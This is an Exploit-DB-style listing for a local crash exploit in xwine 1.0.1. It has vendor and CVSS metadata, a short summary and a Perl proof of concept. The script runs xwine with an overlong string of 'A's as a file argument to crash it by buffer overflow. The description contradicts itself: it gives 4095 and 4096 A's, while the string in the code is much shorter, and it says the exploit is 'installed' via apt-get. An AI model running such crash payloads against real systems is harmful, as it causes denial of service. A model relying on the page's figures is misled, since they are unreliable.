xwine v1.0.1 (.exe file) Local Crash PoC Exploit

vendor:

xwine

by:

JosS

7,5

CVSS

HIGH

Local Crash

119

CWE

Product Name: xwine

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:xwine:xwine:1.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2020

xwine v1.0.1 (.exe file) Local Crash PoC Exploit

This exploit is for xwine v1.0.1 (.exe file) which is a local crash PoC exploit. It uses a payload of 'xwine' followed by 4095 A's and then '.exe' which causes the program to crash. The exploit is written in perl and can be installed using 'sudo apt-get install xwine'.

Mitigation:

The user should update to the latest version of xwine to prevent this vulnerability.

Source

Exploit-DB raw data:

# xwine v1.0.1 (.exe file) Local Crash PoC Exploit
# Install: sudo apt-get install xwine
#
# Author: JosS <Jose Luis Gongora Fernandez>
# mail: sys-project[at]hotmail[dot]com
# site: http://hack0wn.com/
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.


<<crash.pl>>

#!/usr/local/bin/perl

chomp(my $version = `xwine --version`);
if ($version =~ m/v1.0.1/)
{
print "Starting PoC...\n";
# payload = "xwine" . "A" x 4096 . ".exe";
chomp(my $buffer = `xwine AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.exe`);
# print "$buffer\n\n";
}
else
{
print "\n[-] Xwine is not installed on the system\n\n";
exit(1);
}